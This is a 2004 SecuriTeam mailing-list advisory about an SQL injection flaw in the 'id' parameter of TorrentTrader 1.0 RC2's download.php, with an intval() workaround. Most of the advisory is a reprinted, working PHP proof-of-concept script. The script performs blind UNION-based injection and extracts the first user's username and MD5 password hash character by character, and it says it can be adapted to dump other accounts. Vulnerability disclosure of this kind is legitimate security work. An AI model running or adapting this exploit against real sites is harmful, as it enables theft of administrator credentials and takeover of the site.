[UNIX] TorrentTrader SQL Injection
From: SecuriTeam (support_at_securiteam.com)
Date: 09/06/04
- Previous message: SecuriTeam: "[NT] WinZip Multiple Buffer Overflows"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 6 Sep 2004 13:04:00 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
TorrentTrader SQL Injection
------------------------------------------------------------------------
SUMMARY
" <http://www.torrenttrader.com/> TorrentTrader is a feature packed and
highly customisable open-source BitTorrent tracker."
Due to insufficient sanity checks on input variables it is possible to
perform SQL injection through TorrentTrader and retrieve the
administrative username and MD5 password hash.
DETAILS
Vulnerable Systems:
* TorrentTrader version 1.0 RC2, possibly prior
There is no input sanitation on the 'id' parameter of the download.php
script, prior of it being used in an SQL query. Therefore, it is possible
to manipulate the SQL query by passing arbitrary SQL code.
A proof of concept code is provided which dumps the username and password
MD5 of the first user in the torrent web application database, which
should be the administrator. Naturally, the script is adaptable so that
other usernames and password MD5s can be obtained. First it fetchs a valid
torrent id, then it determines if the database's user can perform the
"union select" construct and finally it obtains the username and password
MD5 hash.
Usage:
$ php4 -q ./tt_sqli_poc.php "http://127.0.0.1/torrenttrade"
Workaround
A simple workaround would be to edit line 13 in download.php and replace
it from:
$res = mysql_query("SELECT filename FROM torrents WHERE id = $id");
to:
$res = mysql_query("SELECT filename FROM torrents WHERE id =
".intval($id));
Proof Of Concept
#!/usr/bin/php
<?
/*
TorrentTrader 1.0 RC2 SQL Injection Proof of Concept
By aCiDBiTS acidbits@hotmail.com 31-August-2004
"TorrentTrader (http://www.torrenttrader.com/) is a feature packed
and
highly customisable open-source BitTorrent tracker."
This PoC dumps the username and password's md5 hash of first user
in
TorrentTrader web application database, that should be the administrator.
First it fetchs a valid torrent id, then it determines if database's user
can perform "union select" and finally obtains the username and
md5(password). Tested on TorrentTrader 1.0 RC2, maybe older versions also
vulnerable.
Usage (in my debian box):
php4 -q ./tt_sqli_poc.php "http://127.0.0.1/torrenttrade"
++ Vulnerability description & workaround++
There is no user input sanization for parameter "id" in
download.php prior
beeing used in a SQL query. This can be exploited to manipulate SQL
queries
by injecting arbitrary SQL code. A workaround to solve this is to modify
download.php, line13:
$res = mysql_query("SELECT filename FROM torrents WHERE id =
$id");
With:
$res = mysql_query("SELECT filename FROM torrents WHERE id =
".intval($id));
*/
echo "+----------------------------------------------------------+\n|
TorrentTrader 1.0 RC2 SQL Injection Proof of Concept |\n| By aCiDBiTS
acidbits@hotmail.com 31-August-2004
|\n+----------------------------------------------------------+\n\n";
if($argc<2) die("Usage: ".$argv[0]."
URL_to_TorrentTrader_script\n\n");
$host=$argv[1];
if(substr($host,strlen($host)-1,1)!='/') $host.='/';
echo "[+] Getting valid torrent id ... ";
$webc=get_web($host);
$temp=explode("torrents-details.php?id=",$webc);
$id=intval($temp[1]);
if( !$id ) die( "Failed!\n\n");
echo "OK\n Using Torrent id: $id\n\n";
echo "[+] Checking if injection is possible ... ";
$bas=$id."%20and%200%20union%20select%201%20from%20users%20where%20";
if( test_cond( $bas."1" ) && !test_cond( $bas."0" ) ) echo " OK\n\n";
else
die ("\n\n Failed! \n\n");
echo "[+] Getting username & password ... \n Username: ";
get_field( "username");
echo "\n MD5(Password): ";
get_field( "password" );
die("\n\n \ / \ /\n (Oo) Done! (oO)\n //||\\\\
//||\\\\\n\n");
function test_cond( $cond )
{
global $host;
$res=get_web( $host."download.php?id=".$cond);
if( eregi( "The ID has been found on the Database, but the torrent has
gone!", $res ) )
return 1;
else return 0;
}
function get_field( $field )
{
global $bas;
$unval= "
0123456789ABCDEFGHIJKLMNOPRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
$idx=1;
$min=0;
$max=strlen($unval);
while($min!=$max) {
$mid=$min+(($max-$min)/2);
if(
test_cond($bas."id=1%20and%20ord(substring($field,$idx,1))=".ord(substr($unval,$mid,1)))
) {
$idx++;
echo substr($unval,$mid,1);
$min=0;
$max=strlen($unval);
if(
!test_cond($bas."id=1%20and%20ord(substring($field,$idx,1))") )
return;
} else {
if(
test_cond($bas."id=1%20and%20ord(substring($field,$idx,1))<".ord(substr($unval,$mid,1)))
) $max=$mid;
else $min=$mid;
}
}
die( "\n\nUnexpected error!\n\n");
}
function get_web($url)
{
$ch=curl_init();
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
$data=curl_exec ($ch);
curl_close ($ch);
return $data;
}
/* \ /
(Oo)
//||\\ */
?>
ADDITIONAL INFORMATION
The information has been provided by <mailto:acidbits@hotmail.com>
acidbits.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] WinZip Multiple Buffer Overflows"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [REVS] Lateral SQL Injection: a New Class of Vulnerability in Oracle
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Lateral SQL Injection:
a New Class of Vulnerability in Oracle ... How can an attacker exploit a PL/SQL procedure
that doesn't even take user ... is then dynamically executed via the EXECUTE IMMEDIATE statement.
... (Securiteam) - [UNIX] Multiple Vulnerabilities MetaDot Portal Server
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... SQL Injection: ...
query he can cause an error message to execute script into an unsuspecting ... users browser
thus causing a Cross Site Scripting attack. ... (Securiteam) - [UNIX] Joomla BSQ Sitestats Component Multiple Vulnerabilities
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Secunia Research has discovered
some vulnerabilities in the BSQ ... SQL query. ... Successful exploitation
requires that "register_globals" is enabled. ... (Securiteam) - [UNIX] dev4u CMS Multiple SQL Injection and Cross Site Scripting Issues
... The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com ... dev4u CMS Multiple SQL
Injection and Cross Site Scripting Issues ... arbitrary SQL statements as well as include
arbitrary HTML and/or ... (Securiteam) - [UNIX] WordPress Cafelog SQL Injection Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... WordPress Cafelog has been found
to contain an SQL Injection vulnerability ... (Securiteam)
